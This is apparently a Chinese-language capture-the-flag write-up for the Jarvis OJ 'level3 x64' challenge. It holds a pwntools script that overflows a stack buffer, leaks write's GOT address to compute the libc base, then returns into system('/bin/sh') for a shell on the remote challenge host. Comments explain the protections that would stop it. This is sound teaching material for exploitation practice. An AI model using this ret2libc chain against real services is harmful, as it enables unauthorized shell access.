[XMAN]level3(x64)
nc pwn2.jarvisoj.com 9883
Hint1: 本题附件已更新,请大家重新下载以免影响解题。
level3_x64.rar.9169aec8b6cb4bfc3a0f5c50a7519004
64位ret2libc:第一次溢出调用write输出GOT中write的实际地址,据此算出libc基址;返回漏洞函数后第二次溢出,跳转到system("/bin/sh")。
exp如下:
from pwn import *

# Two-stage ret2libc walk-through for the 64-bit level3 exercise.
#
# Stage 1 overflows the stack buffer and returns into write@plt so the
# process prints the resolved address stored in write's GOT slot; that
# single pointer reveals where libc is mapped. Stage 2 overflows again and
# returns into system() with a pointer to libc's own "/bin/sh" string.
#
# What the technique depends on (useful when reading this as a defender):
#   * every code address below is a fixed constant, which suggests the
#     binary is not position-independent -- confirm with checksec;
#   * the saved return address is reached after 136 filler bytes with no
#     canary handling, so presumably no stack protector -- confirm;
#   * the local libc-2.19.so must be the same build the service runs,
#     otherwise the symbol offsets are wrong.
# A bounded read in the vulnerable function removes the root cause; stack
# canaries, PIE and shadow-stack style return protection each break one of
# the assumptions above.

# Session and images. For a local run the write-up's alternative is
# process('./level3_x64') together with libc = elf.libc.
io = remote('pwn2.jarvisoj.com', 9883)
elf = ELF('./level3_x64')
libc = ELF('./libc-2.19.so')

# Fixed addresses inside level3_x64.
POP_RDI = 0x4006b3       # gadget loading rdi (1st argument), per its name
POP_RSI_R15 = 0x4006b1   # gadget loading rsi (2nd argument) and r15
WRITE_PLT = 0x4004B0
WRITE_GOT = 0x600A58
VULN_FUNC = 0x4005E6     # re-entered after the leak to get a second overflow

# Filler up to the saved return address.
FILLER = b'a' * 136

# Stage 1: write(1, write_got, rdx). The chain never loads rdx, so the
# length is whatever the register holds on return -- NOTE(review): this
# presumably is the size left over from the vulnerable read; verify in a
# debugger.
leak_chain = [
    p64(POP_RDI), p64(1),
    p64(POP_RSI_R15), p64(WRITE_GOT), p64(0),   # the 0 only fills r15
    p64(WRITE_PLT),
    p64(VULN_FUNC),
]
stage_one = FILLER + b''.join(leak_chain)

io.recvuntil('Input:\n')
io.send(stage_one)

# The first 8 bytes sent back are the little-endian address of write().
leaked = io.recv(8)
write_addr = u64(leaked)
info("write_addr:" + hex(write_addr))

# Rebase the libc symbols on the leaked pointer.
libc_base = write_addr - libc.symbols['write']
info("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
info("system_addr:" + hex(system_addr))
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
info("binsh_addr" + hex(binsh_addr))

# Stage 2: system("/bin/sh") through the same overflow.
stage_two = FILLER + b''.join([p64(POP_RDI), p64(binsh_addr), p64(system_addr)])

io.recvuntil('Input:\n')
io.send(stage_two)
io.interactive()